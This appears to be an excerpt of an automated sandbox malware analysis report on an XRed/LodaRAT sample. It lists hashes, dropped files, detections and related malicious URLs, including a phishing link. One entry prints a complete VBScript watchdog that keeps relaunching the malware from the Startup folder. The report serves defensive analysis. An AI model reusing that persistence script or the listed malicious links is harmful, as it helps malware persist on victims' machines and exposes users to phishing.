                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        aYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        gDPzgKHFws.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        https://www.bing.com/search?pglt=41&q=%E5%B9%B3%E6%88%9031%E5%B9%B4+%E8%A5%BF%E6%9A%A6&cvid=467cba4c80be484e858dd735013f0921&gs_lcrp=EgRlZGdlKgYIARAAGEAyBggAEEUYOTIGCAEQABhAMgYIAhAAGEAyBggDEAAYQDIGCAQQABhAMgYIBRAAGEAyBggGEAAYQDIGCAcQABhAMgYICBAAGEAyCAgJEOkHGPxV0gEINjUyMGowajGoAgCwAgE&FORM=ANNAB1&PC=U531Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.246.63
                                                                                                                                                        freedns.afraid.orgblq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                        • 69.42.215.252
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\ProgramData\Synaptics\Synaptics.exe | RNEQTT.exe | Get hash | malicious | LodaRAT, XRed | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe | RNEQTT.exe | Get hash | malicious | LodaRAT, XRed | Browse |
C:\ProgramData\Synaptics\RCX4F1F.tmp | RNEQTT.exe | Get hash | malicious | LodaRAT, XRed | Browse |
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):118
                                                                                                                                                              Entropy (8bit):3.5700810731231707
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                              MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):771584
                                                                                                                                                              Entropy (8bit):6.629891194746731
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                                                              MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                              SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                                                              SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                                                              SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4F1F.tmp, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1688576
                                                                                                                                                              Entropy (8bit):7.451847174682131
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:49152:MnsHyjtk2MYC5GDshloJfxBHUklI7GkBf:Mnsmtk2a5hliBHUklI66f
                                                                                                                                                              MD5:019FC60427D0126ADFEC88980C7FB666
                                                                                                                                                              SHA1:55E2550CE27991E708E30A2E75253093EED0EDB3
                                                                                                                                                              SHA-256:6BF3A9C47D0DC7CBDE76EB4DBD81F9FCAC54F64D7BF907FF952438503D8588B6
                                                                                                                                                              SHA-512:F8013FB625BB6354B50D7C27331C3088904DDD9103E0B28BAC8965EDD83D86353250E97AA872B82756D2765064D5BE30E9E9579E216805C12216634627311A86
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RNEQTT[1].exe, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: RNEQTT.exe, Detection: malicious, Browse
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.248097462190004
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                              MD5:A506B5208FBFCE8648CEA8BC8260B01A
                                                                                                                                                              SHA1:328FCE82E8B27EA2D85935EF87FD19936CDE7BC7
                                                                                                                                                              SHA-256:8EBFA93ECD2E70D40E01DC3A3300F5D74F901F1DDE917877620D6BE5541B01F1
                                                                                                                                                              SHA-512:03AAB0ACD0673406EA4023D36F6BB633EFB375DAFE9A565397C22AC68ECFE489639F47A93C593A9624A662F57955AB8A0CA2908F0A05C930A0E7399FEE66FD64
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:Microsoft Excel 2007+
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):18387
                                                                                                                                                              Entropy (8bit):7.523057953697544
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                              MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                              SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                              SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                              SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.269599946472833
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                              MD5:1C1123BEAA489534747E322B76608076
                                                                                                                                                              SHA1:4F8F0B7070C0DA11E92231700A107C96CC710380
                                                                                                                                                              SHA-256:04B19C8DF60CDDFF407BD95A9FB7D56D9476058C1B7CF33F81F0D5232D8FA64E
                                                                                                                                                              SHA-512:5EBEEBF45C48C333CE25380C7B156E5350E933DCD37174F82340B091326BF095541902B81DB1AF0A59F08A91B0ED67E530374F192024C463A5294FC2D9C1C086
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.269558908008821
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0hibSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Fb+pAZewRDK4mW
                                                                                                                                                              MD5:FC6FB3D68D756BE3CCA1910398ECB45D
                                                                                                                                                              SHA1:2D15C0861F74C035E48E5F6D4FE54BB9CCF00304
                                                                                                                                                              SHA-256:EF8FD9213FC01A87133A9A06F71A64F9AC30E0A14AA344C4C32F2BCF3D727A45
                                                                                                                                                              SHA-512:F167F2F3D596F6C0B829C9B713131ECAFC1B51243F37D472245199492C3CFFACC10D570E15DADBA82D3AADD27E2A97D78924B2E9E57542657510835311883842
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.255957907722911
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                                                                              MD5:D9745C2943534A0CCE8B86150FC2D873
                                                                                                                                                              SHA1:5EB3532CEDF625237E2B192E81E1C6DC83D24D16
                                                                                                                                                              SHA-256:84BDE1799450ABDEE4D2950584D96E002E94A88D98B88286A1A78777285B9509
                                                                                                                                                              SHA-512:FCF5CC1EED6D0E54865D8C908B96284CC8BA014F20C2B2150E83AD6D984527076F518304BD8F7B485EA1600715A54B00BCBF1E8823E5321964E25A2725284E0F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.260473418495811
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                                                              MD5:3BE7E8B19797120A2F76B91AEEE186BA
                                                                                                                                                              SHA1:BFDDB0C8BF7366A36965E32F889E51D81918C311
                                                                                                                                                              SHA-256:3C53A0F2CDB0C84280F379545A59CAA25FF7C6AEDE0E907E6A5CF3E39ACBA5A6
                                                                                                                                                              SHA-512:0F68557781C35250336186AA927708EE87B802B09E06F61A4C4A20A1A650A89FF81434E327D72D5DD9D83E8C4CE380A2B85B92A5F764C8D4BEE9B55DB9C70262
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.275478260150864
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0yGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                                                              MD5:E47E8CD671547BE46A97DC6D4F5C9D25
                                                                                                                                                              SHA1:6F16170AB52D6BDA82D223D437D74455C369005C
                                                                                                                                                              SHA-256:B911339BA12637EF0A41AB57566055C563397E1A97A4DC1FFD17AA97551620DC
                                                                                                                                                              SHA-512:24DCE86BBE1AD672BE0CFBBBC1DF0C54F7D389F70232DC2C49EA6DC21B40D400DB25E6F5AA3EEFC7BA31388664005974B39BD6538394D2F94173214ABBBB9746
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.252839256708489
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0s1SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N1+pAZewRDK4mW
                                                                                                                                                              MD5:71E0B201F5E565910D4F0410B17BAB01
                                                                                                                                                              SHA1:C40F3C88BFCD21EDA83D76836BBE41CBB540997A
                                                                                                                                                              SHA-256:9035589F49D6E576452C0989A214F711F932DF9B2CD8387C7EB84B032B74EE8E
                                                                                                                                                              SHA-512:45AE738B6D5BC101AAF1C13E415DE0E2BCAA18977A3CF30832765E953705F6F1EE4A64F099E26FB8646679B16C6BB1A8C925154AB81F42366298CEB32E4A2ADF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.253803825870797
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                                                                                              MD5:2AF71B388A204D1C93336EC5B98C5AA1
                                                                                                                                                              SHA1:37EA627C6B561BCC6D15DFA8D237229E5B96A30C
                                                                                                                                                              SHA-256:EA90D265C5DBD15503369868FDE583B78D9EE51AFAADE7B7F211BA69BD6986BB
                                                                                                                                                              SHA-512:B0571098D66E9D678DEAE76D717232F625991EEFA61B117C6F485B3A47B7E2615A88E262C191F52479EC6F806F42BA3A5ED7336290B8DA1FD25ACA1F0BC69999
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):891
                                                                                                                                                              Entropy (8bit):5.342962320971981
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:dF/UFHHmuVMHiU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFHGucXt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                              MD5:44B5015EE40F27FEF5AEB980F2EB7D38
                                                                                                                                                              SHA1:009BD9BEE2ED7BFD888B5BA094559355A37E7E64
                                                                                                                                                              SHA-256:32C6E94CD8E5133A241ADC7DCCEDFBEC0E0B3E4A0A0DB33B4C0DAE01304CC137
                                                                                                                                                              SHA-512:B422282D9E571B35D93B714B28E861DCE2451E2DE06A5485FACA702AE954E1A6F8028023173C2A772F8BCB393A465FFB4020E322A017C5AF4EB791805830E627
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\VFNCBO.vbs, Author: Joe Security
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_update.exe"..fileset = """C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.252222972613939
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0FTDeSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2TDe+pAZewRDK4mW
                                                                                                                                                              MD5:EC1E3C645F5A3759F54F60F37087DEFE
                                                                                                                                                              SHA1:70868B5A1617FDA7B4E99EAD2BD8705828CB7FFD
                                                                                                                                                              SHA-256:5AF831051C77E0CBC4868E8150697885ECDF2E3D26F4FA1B9C40D5552967FA7B
                                                                                                                                                              SHA-512:5598A978E400D7B4D230EC0CE4EABE9160B859FBB2C34D009790CDF26F779AFA9282125BB60C56FA03A0615844CD4B9D674D97B0EC9A2507D2415D115280EE96
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2705153615236995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                                                                              MD5:A7B61544DC5772465408EF804204971D
                                                                                                                                                              SHA1:9B8A146A2E3FCA5DCD0BF2B88735FDC9057F6E45
                                                                                                                                                              SHA-256:724EA135F73CF04E59925EA115FCFF04D1ED8574C180B9AEA1501D120F339AC8
                                                                                                                                                              SHA-512:1401F4BF4A9583B4C608246BA2D2B9367A0C1FD3E05AFCEDF997C3C9D595966BA2F0660B7FDC9AF468838CE316880D6FF4A81F16B90169615C91ECE85B52C068
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.246300257376916
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0N5vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qv+pAZewRDK4mW
                                                                                                                                                              MD5:41D84EC904B6DDA1037B130FC5AC1C0B
                                                                                                                                                              SHA1:A2131E15DA9E8F7CBDDF27B803F083D2E9940AD8
                                                                                                                                                              SHA-256:EFE4AADB109B8D2FDFA0443FE15956E65F9C9F16AEFB4BB4F143C81B734E1537
                                                                                                                                                              SHA-512:926606236419BDA50E86C0E384C3EE8ACEC50F790CD36861F7BC101E30A966E82820859378582CE310E69A7257CFEA76DB0FD997BA95C4F09F675A32249EC3A2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.274996892100195
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0kGnWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                              MD5:42548F70B176CBC247FE0408993C69E2
                                                                                                                                                              SHA1:95DAD9A508A769475DBF00E4FBCA90EB10F7F99C
                                                                                                                                                              SHA-256:87E3F8947E3F620F1CF47B0DE496668AC5DF5B48BD33CBA67269A713A2024F08
                                                                                                                                                              SHA-512:F996D637C56867B38427B6936152778A9C98476478C1563343979828273A88477CAB2F29ABFD8A6BB06AC2AB127E7F86640E9ABBE7565E1881995040A3F85265
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.270120281243207
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0ZWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                                                                                              MD5:5AE5664EA89F84A76DE121E2050F2D3A
                                                                                                                                                              SHA1:D7B8176D9E600A2B0711B5CD3812FD331D0418AF
                                                                                                                                                              SHA-256:1347C60176A064632B0EB818E343739B98C1EDDC515B0934BDCD12B0112FD388
                                                                                                                                                              SHA-512:5D30225E49242527415080A0251A0A4732B341509F1B645A9CD95CF85DAD3541508598A869D4FD268592BE0BCF6C365BD80A60F035B3BCF1C2674292E28CF851
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.268978759114767
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0C73SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T73+pAZewRDK4mW
                                                                                                                                                              MD5:218D81AB14FFC45A9849B5C41543D289
                                                                                                                                                              SHA1:E7BDADE74BE2804CBF524688BFEFAAE6C21F1C4F
                                                                                                                                                              SHA-256:D6459039292198F167530FA1929891FDD97E384BFDB2661E6BB06C6B5DDABE35
                                                                                                                                                              SHA-512:5972819700FCD9C5A45BE4AD11C11B353956AD692FD100B1AABBE53F373F9B057BE11E0E5DF9F7E6B7262AB2FEB96447193D351C253089F41DB2E77AABDE2ED2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.25079964246155
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+090XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                                              MD5:E292AC7CB30E3CC34A5A686C88202BA7
                                                                                                                                                              SHA1:2F817ACA49A7D9F2AC1ABA39BAF8A5C7FEBB57FA
                                                                                                                                                              SHA-256:F14D14B6FE6FF85B07BB44BF58B2DAA46BDC00CE253C4BE5F3FE3AB7EA33E8D0
                                                                                                                                                              SHA-512:C2F71D823CB3BB4A391B50CFA99540934E24E5A13DA7D92A652E2216C0E55194CBBD0BAB25816DB33554C76EE6598C6650C0346A11941BC74C602B9024933802
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1652
                                                                                                                                                              Entropy (8bit):5.2704177225119935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:GgsF+0lrPSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+CrP+pAZewRDK4mW
                                                                                                                                                              MD5:F379F5E67922D2805B3021B89E2C7607
                                                                                                                                                              SHA1:AD625204D2312B2A5E1B11AAAAB6CFC7032E02AE
                                                                                                                                                              SHA-256:403F767DFB195307C9D5C3D3ECC76D2CD63F82ECB959C660EC88E707C27AE7FA
